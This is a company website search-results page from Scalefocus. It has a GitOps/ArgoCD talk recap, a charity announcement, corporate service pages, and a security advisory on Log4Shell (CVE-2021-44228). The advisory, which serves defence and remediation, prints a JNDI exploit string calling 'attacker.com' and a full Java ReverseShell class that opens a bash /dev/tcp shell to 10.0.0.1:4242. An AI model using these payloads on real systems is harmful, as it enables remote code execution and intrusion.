Search Results

203 items found

Blog Posts (91)

  • Tech Savvy Talks Vol.2 GitOps on AWS: Simplify Kubernetes Deployments

    The second edition of the Scalefocus series Tech Savvy Talks was held on 20 October. If you are new here: Tech Savvy Talks are online events organised bi-weekly, covering various technology topics. The initiative's primary goal is to gather colleagues and people with similar interests to discuss new tech trends and best practices, and to share knowledge and insights from their expertise. Another plus of the activity is that it's free and open to anyone. Follow Scalefocus's profile and be the first to know about the upcoming topics and events.

    Now let's explore the second episode, dedicated to GitOps on AWS: Simplify Kubernetes Deployments. The presenter was Petar Gjorgievski, a DevOps Engineer at Scalefocus based in Skopje. During his talk, he covered topics such as:

      • What is GitOps
      • GitOps principles
      • GitOps benefits
      • How a GitOps pipeline might look
      • Explore the ArgoCD tool
      • Short demo where we are going to try to configure and set up a working GitOps pipeline

    What exactly is GitOps

    GitOps is a way to do Kubernetes cluster management and application delivery. GitOps works by using Git as a single source of truth for declarative infrastructure and applications. With GitOps, software agents can alert on any divergence between Git and what's running in a cluster, and if there is a difference, Kubernetes reconcilers automatically update or roll back the cluster, depending on the case. With Git at the center of your delivery pipelines, developers can use familiar tools to make pull requests to accelerate and simplify both application deployments and operations tasks to Kubernetes.

    Let's talk about GitOps principles

      • The entire system described declaratively. With your application's declarations versioned in Git, you have a single source of truth. Your apps can then be easily deployed and rolled back to and from Kubernetes. And even more importantly, when disaster strikes, your cluster's infrastructure can also be dependably and quickly reproduced.
      • The canonical desired system state versioned in Git. With the declaration of your system stored in a version control system, and serving as your source of truth, you have a single place from which everything is derived and driven. This trivializes rollbacks, which can be achieved with a simple git revert. Using Git, you get the extra benefit of being able to see the authors of the code.
      • Approved changes that can be automatically applied to the system. This means that every time a pull request is approved and merged, you are able to sync up your cluster automatically and make a deployment without the necessity to give direct access to the cluster.
      • Software agents to ensure correctness and alert on divergence. This means that there is essentially an agent which always monitors both the current state of the cluster and the source of truth and alerts on any changes on either side of the configuration.

    This leads us to the Benefits of GitOps

      1. Simply said, it increases productivity. Continuous deployment automation with an integrated feedback loop speeds up the time to deployment.
      2. Enhanced Developer Experience. Developers just have to push code to Git and not worry about building containers or knowing the internal workings and configurations of the Kubernetes cluster. This also makes it easier to onboard new colleagues and get them to start contributing faster.
      3. Improved Stability & Higher Reliability. Using Git gives more stable, reliable and reproducible rollbacks. As we mentioned previously, Git is also the only source of truth, the alpha and omega. It can help recover from disasters relatively quickly.
      4. Consistency and Standardization. Finally, GitOps offers us consistency, meaning that everything we have, our whole workflow including the application code and infrastructure code, is built on top of our Git repositories.

    Git Workflow

      1. Leverages Git workflow
      2. Git as source of truth
      3. Manage multiple environments
      4. Easy rollbacks

    ArgoCD

    ArgoCD is a GitOps tool that helps with your GitOps workflows. ArgoCD can be used as a standalone tool or as part of your CI/CD workflow. ArgoCD works with Git as a source of truth, with current Kubernetes manifests, or with Helm charts. It can be managed both declaratively through a click or a Dashboard, which is quite nice, to be honest. It can be deployed inside of your cluster or outside of it, and in the whole GitOps workflow it operates like a general commanding its army. For more, watch the demo. There are alternatives, for example Flux, Jenkins X, and a few others as well. But we are sticking with ArgoCD.

    ArgoCD Positives

      1. Container native workflow
      2. Event based dependency manager for K8s
      3. Declarative continuous delivery for K8s
      4. Dashboard

    With all that cleared up, we can proceed with the DEMO. You can watch it here, along with the whole Tech Savvy talk, where Petar Gjorgievski shared a lot more details and knowledge on the mentioned topics and many more, for example a model of a GitOps pipeline and a setup.

    Got your interest? To see the talks and check what's next, don't forget to sign up for the following events: Scalefocus Events | Eventbrite

    Oh, and last but not least, it's not all so work-oriented: we have some gifts for you. Attend the next Tech Savvy Talk and get yours. See you there.

  • How to address the critical Log4Shell/LogJam vulnerability

    Yordan Popov, Security Engineer

    On the 9th of December 2021 a zero-day exploit affecting the popular Apache Log4j utility was made public as CVE-2021-44228. This vulnerability is actively being exploited, and anyone using Log4j should take immediate action to remediate this security-critical component. In this article we will go over the vulnerability and its remediations.

    TL;DR

      • CVE-2021-44228 impacts the Apache Log4J Java library
      • Easy to exploit, high impact, achieves RCE (remote code execution) with system-level permissions
      • Patch Log4J to version >=2.15.0

    What is Log4j?

    A Java-based library used for logging in a large percentage of Java applications. According to the Maven Central Repository, Log4j is used in 16,601 open-source projects. Some of the confirmed vulnerable organisations / components are:

      • Apple
      • Minecraft
      • Steam
      • Twitter
      • Elasticsearch

    And many others. For additional information on the confirmed vulnerable services.

    Vulnerability

    The following payload would exploit this vulnerability:

        ${jndi:ldap://attacker.com/a}

    Using the JNDI interface, Log4j will download a .class file and deserialize it in an unsafe manner. By utilizing a built-in feature of Java, the static initializer (code in a static initializer block is executed by the virtual machine when the class is loaded), RCE can be achieved. Of course, there are other ways to achieve code execution, which is why patching is very important.

    If the JVM property com.sun.jndi.ldap.object.trustURLCodebase is set to true, another possibility is utilizing an LDAP ObjectFactory. An LDAP ObjectFactory lets the LDAP response tell where to get the bytecode of another ObjectFactory.

        import java.util.Hashtable;
        import javax.naming.Context;
        import javax.naming.Name;
        import javax.naming.spi.ObjectFactory;

        // ObjectFactory whose bytecode location is supplied by the LDAP response
        public class ReverseShell implements ObjectFactory {
            @Override
            public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception {
                // Runs when the vulnerable JVM instantiates the factory
                Runtime r = Runtime.getRuntime();
                Process p = r.exec(getShellPayload());
                p.waitFor();
                return null;
            }

            // Builds the shell command that connects back to 10.0.0.1:4242
            public String getShellPayload() {
                return new StringBuilder()
                    .append("/bin/bash -c \'")
                    .append("exec 5<>/dev/tcp/10.0.0.1/4242;")
                    .append("cat <&5 | ")
                    .append("while read line; ")
                    .append("do $line 2>&5 >&5; ")
                    .append("done\'")
                    .toString();
            }
        }

    According to LunaSec, JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 do not seem to be affected by the above LDAP attack, since com.sun.jndi.ldap.object.trustURLCodebase is set to false; however, the other method is working.

    Impact

    Logging untrusted user input can result in remote code execution if a vulnerable version of Log4j is used. The impact is critical, since it's relatively easy to exploit (just a single line which is logged!) and it achieves system-level privileges. As a result, CVE-2021-44228 is rated a perfect 10/10 CVSS score.

    How to test

    There are multiple ways to detect if you are vulnerable.

      • Check logs - someone might have exploited it already!
      • Use an open source tool like LogShell-Detector
      • Utilize the Huntress Online Tool
      • Trigger a DNS query, either by using your own authoritative DNS server or the following open source web app, CanaryTokens.org:
          1. Go to https://canarytokens.org/generate#
          2. Generate a DNS token (something like hq61hp3upawijfa7zqqdcdm60.canarytokens.com) and put in your email address.
          3. Craft the following payload: ${jndi:ldap:///a}, something like: ${jndi:ldap://hq61hp3upawijfa7zqqdcdm60.canarytokens.com/a}
          4. Place it everywhere user input is provided and might be logged (search forms, profile data, HTTP headers, etc.)
          5. If an email is received saying that a DNS lookup was performed, then you are vulnerable!

    Remediation

    The best way to mitigate this is by patching to a version >=2.15.0. However, keep in mind that you will not be able to patch the vulnerability if a vulnerable version of Log4j is used in a dependency which you are importing. For this reason, set log4j2.formatMsgNoLookups to true (Log4J >=2.10) and monitor the logs; also add YARA rules if possible. Another mitigation is completely removing the JndiLookup class from the classpath, but that may affect the usability of the application.

    CyberSec Risk Manager - CsRM

    With our platform CsRM we were able to detect the Log4j vulnerability within less than 16 hours of it being publicly available, allowing our customers to take immediate action on their affected services. The CsRM platform monitors your vulnerabilities, risk & compliance in all open source code components, infrastructure and cloud, empowering you to take accurate and informed decisions for your business at any time. For more information check out - CsRM

    References

      • https://www.lunasec.io/docs/blog/log4j-zero-day/#exploit-steps
      • https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
      • https://www.blumira.com/cve-2021-44228-log4shell/
      • https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/
      • https://www.cloudsavvyit.com/15042/critical-rce-zero-day-exploit-found-in-popular-java-logging-library-log4j-affects-much-of-the-internet/
      • https://github.com/advisories/GHSA-jfh8-c2jp-5v3q

  • Free medical checks and early diagnostics of prostate cancer in December

    The software company Scalefocus provides over 80 prophylactic medical checks in Acibadem City Clinic Tokuda Hospital through the initiative IT Beards.

    The third edition of the IT Beards initiative of Scalefocus provides over 80 free prophylactic medical checks for early diagnostics of prostate cancer in men at risk ages. The charity campaign, part of Movember, was conducted throughout the month of November. Scalefocus created a special platform for the cause, on which employees of the company published photos of their beards and moustaches, generating votes for their special vision. The generated funds will be donated to Acibadem City Clinic Tokuda Hospital to conduct medical screening at the Clinic of Urology, led by Prof. Kaloyan Davidov. The checks will take place in December. Registrations can be made by phone: 02/403 4000.

    The goal of the initiative is to provide timely access to specialized health assistance, as the prevention and early diagnostics of this malicious disease are of utmost importance for the course of its treatment. Prostate cancer can be cured if diagnosed on time. The disease has no symptoms, and if any appear, this usually happens at a late stage. The free medical checks are recommended for men over 50 years, or, in case of family history of the disease, over 45 years of age. The gathered funds from the IT Beards campaign will be realized in partnership with Acibadem City Clinic Tokuda Hospital and the CancerCare.bg foundation.

    ‘Health is a matter of responsibility to yourself and to your family, to people whom you love and who love you. If we face a challenging situation, we should first try to accept it and then soundly assess what could be of help, instead of fighting against it, so that we can continue living a good life, as much as possible.’ MD Margarita Tarejn, clinical psychologist and a member of the multidisciplinary team at the University Hospital Tokuda, participating in the campaign devoted to men’s health.

Pages (112)

  • Scalefocus | Software Development & Digital Services

    Let’s Laugh, Code, Grow Together

    Our Services

    We provide software development and digital services that enable organizations to operate, innovate and scale their business, by leveraging cutting-edge technologies, top talent and cross-industry expertise.

      • Strategy & Advisory: Technology Strategy, Software Architecture, Program Management, Business Analysis, Security Consulting
      • Digital Engineering: Software Engineering, UI Engineering, Mobile Everything, Data & Analytics
      • Intelligent Automation: ML & AI, Application Integration, Internet of Things
      • Infrastructure & Operations: Cloud & DevOps, Cybersecurity, Application Support, Infrastructure Support

    We are partnering with the world’s Leading Technology Companies

    Our Solutions

    We deliver technology driven solutions that help organizations to solve complex business challenges and accelerate innovation, by utilizing our pre-built frameworks and domain specific know-how.

      • Application Continuity Center: Guarantee the continuity of all your critical systems. Enabling organizations to overcome incidents by leveraging data-driven incremental improvements, AI and swarm intelligence.
      • Cybersecurity Risk Manager: Continuously assess your Cyber Threats. Empowering organizations to quantify and address the ever-increasing cyber threats.
      • E-Commerce: Omnichannel commerce for the large enterprise. Helping enterprises create unified customer journey and reduce total cost of ownership with Cloud-native eCommerce omni-channel solution and marketplace.

    We deliver solutions with Industry Leading Platforms

    Our Achievements

    Founded in 2012, today Scalefocus is the biggest Bulgarian owned software engineering company.

      • 500+ Completed Projects
      • 300+ Clients Worldwide
      • 100+ Awards & Recognitions
      • 9.2/10 Customer Net Promoter Score

    “At our core, we are an engineering company - passionate about designing and building solutions that harness cutting-edge technologies, and enable businesses to operate, innovate and scale within a truly digital world. Our strength and advantage lies in our agility, cross-industry expertise and top talent pool.” Ivan Ivanov, CEO, Scalefocus

    Our Work

    We have a global client base that includes Fortune 500 companies, innovative startups and industry leaders in Information Technology, E-Commerce, Insurance, Healthcare, Finance and Energy & Utilities.

      • Telecom & Media: Doubling Productivity with Offshore Software Development Center
      • Healthcare & Life Science: Next Level DevOps Maturity with Azure DevOps Server
      • Healthcare & Life Science: Automated Claim Settlement Cuts Down Processing Time in Half

    What our clients say about us

    “We have been partnering with Scalefocus for a number of our projects since 2016. Working together, our engineering teams have helped position Paysafe as a leading payment solutions provider powered by great technology within the fast-paced payments industry.” – Miroslav Bojilov, Paysafe

    Our Stories

    See how we are transforming businesses and delivering digital innovation by reading client success stories, staying up to date on our current endeavors, virtual events and more.

      • Tech Savvy Talks Vol.2 GitOps on AWS: Simplify Kubernetes Deployments (20.12.2021)
      • How to address the critical Log4Shell/LogJam vulnerability (10.12.2021)
      • Free medical checks and early diagnostics of prostate cancer in Decemb (9.12.2021)

  • Energy and Utilities Solutions I Scalefocus

    Energy And Utilities: Fueling Your Future Growth Today

    We help Energy & Utilities companies to streamline their operations and thrive as digital powerhouses driven by data and technologies.

    Visit us at E-World 2022, Stand: 2-119, 8-10 February, Essen, Germany. If you happen to be in town, we would like to meet you in person and chat about how we can help you innovate and meet the challenges of tomorrow.

    Are You Ready for Tomorrow?

      • Do you fully understand what technologies are available and applicable to your needs?
      • Are you a master of your data, or are topics such as data collection, data cleansing & standardization, data streaming and data analytics still on the agenda?
      • Is your ETRM system and trading IT landscape fully in the cloud already?
      • Have you conquered AI, ML and predictive analytics?
      • Does your ETRM system landscape fit all your needs, or is it up for modernization?
      • Is your business able to respond to the demand for mobility? Are your employees and shareholders able to use a mobile app to check on daily updates & access business processes?
      • Have you already harnessed the possibilities of a complete and modern systems integration architecture?

    No? Maybe? Let’s talk! We have a comprehensive understanding of the energy sector and its challenges. Explore further our services and find out where we can add value to your IT operations.

    Why Scalefocus

      • We are an end-to-end services provider that delivers strategic consulting and development of data management, infrastructure, ETRM, and mobile solutions through innovative technology, domain experience, and specialization
      • We remove data silos and connect your data in a single, actionable ecosystem that leverages data and analytics to give you a competitive advantage
      • We offer the full spectrum of software development services, from upgrade and migration of legacy systems, custom and reusable market analytics solutions, ETRM and Energy Software Development, to cloud, IoT, RPA, and intuitive mobile applications
      • We reduce costs and optimize operational efficiency and asset management through intelligent automation, cloud infrastructure, and strategic consultancy

    Our Services

      • Intelligent Data Management & Analytics: High-quality data enables companies to harvest insights and accurate forecasts to understand their network and assets. We develop scalable data platforms that remove data silos and foster data centralization. We enhance operational and analytical data management using data lakes, data & streaming analytics platforms.
      • Consulting Services in Energy Trading and ETRM Products: We are experienced in business process modelling in the area of Energy Trading, including implementation of custom, OTC & exchange-traded products; automating business processes; and implementing solutions to comply with specific regulatory requirements.
      • ETRM Systems Implementation & Energy Software Development: Our consultants are experienced in large-scale ETRM systems implementation, redesign and development projects as well as trading landscape transformations that drive strategic results. We have vast expertise in greenfield implementations, ETRM system upgrades, custom ETRM system development as well as process redesign and integration with other systems.
      • Cloud Solutions: You can’t be a next-gen digital utility if you don’t have one foot in the cloud. Moving to the cloud reduces IT spending, increases security and resilience. We establish cloud migration strategies and build hybrid cloud solutions. Our experts have experience with cloud-native systems redesign and complete solutions for trading operations.
      • Mobile Solutions: We develop native mobile applications for both Android and iOS. We have extensive experience with enterprise solutions used to empower our customers’ employees in their day-to-day operations.
      • IoT Services: Smart grids and metering generate substantial data volumes, and IoT creates numerous new data points that put additional pressure on the IT infrastructure. We enable intelligent networks with smart metering, smart grids, and e-mobility fleet management.
      • RPA: The industry’s ever faster pace constantly increases data-intensive and manual risk processes as well as the need for reconciliation. To tackle this, we utilize RPA and realize cost optimizations along the value chain, where repetitive and rule-based tasks within Middle and Back Office processes can be automated.
      • Systems Integration: The growing need for coordination and interconnectivity between different entities and their systems is at the core of our Systems Integration Services. We develop and deliver detailed training programs on SOA (Service Oriented Architecture) and microservices architecture, which is a first step towards a redesigned and decentralized ETRM and IT systems landscape.
      • Solutions Selection Consultancy: According to Energy Risk’s 2021 Software Survey, 70% of respondents said the biggest IT challenge for energy risk managers and traders was “understanding what new technologies are available and applicable”. Our consultants will find the right technological solution for your unique business situation.
      • Enterprise Resource Planning: We establish the backbone of every intelligent enterprise through implementation and migration to SAP S/4HANA ERP. We are building event-oriented resource planning systems which provide a repository of business and system events that measure the success of all automated and human-driven business operations.

    Our Work

      • Energy & Utilities: Next-Generation Digital Platform for Energy Supply and Sales
      • Energy & Utilities: Real-time Analytics and Data Visualization Platform
      • Energy & Utilities: Increasing Employee Engagement with Energy Market Insights
